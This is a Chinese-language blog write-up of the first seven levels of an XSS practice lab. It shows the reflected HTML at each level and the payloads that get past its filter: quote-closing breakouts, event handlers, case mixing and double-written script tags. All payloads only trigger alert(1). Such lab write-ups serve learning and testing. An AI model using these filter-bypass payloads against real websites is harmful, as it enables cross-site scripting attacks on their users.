XSS
(0)



第一关
直接<script>alert(1)</script>就可以通过,没有任何过滤

第二关
输入第一关的<script>alert(1)</script>,发现通过不了,查看源代码:
<input name=keyword value="<script>alert(1)</script>">
需要闭合"和<input

第三关
没有找到和"><script>alert(1)</script>相关的结果.
代码:
<input name=keyword value='&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;'>
发现"和>和<都被转义。所以要用'对value闭合,用//把input的后半段注释掉

第四关
用第三关的结果并不行

代码:<input name=keyword value="'onclick=alert(1)//">
只需要将单引号改为双引号

第五关
尝试输入多种得到结果
<input name=keyword value=""o_nclick=alert(1)//">
<input name=keyword value=""><scr_ipt>alert(1)</script>">
发现onclick和script都被截断
但是"和<和>并没有被转义
可以构造一个a标签:">

标签定义超链接,用于从一张页面链接到另一张页面。
元素最重要的属性是 href 属性,它指示链接的目标。
标签的 target 属性规定在何处打开链接文档。

第六关
<input name=keyword value="">
">
发现在第五关的基础上href也被截段了;
可以改变大小写来通过
"><scRipt>alert(1)</scRipt>

第七关


代码:<input name=keyword value=""><>alert(1)</>">
发现script直接都被清除了
所以可以多构造一个script:"><scrscriptipt>alert(1)</scrscriptipt>
这样在清除一个后还有另一个正好可以用

本文为作者hackerbo.com发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论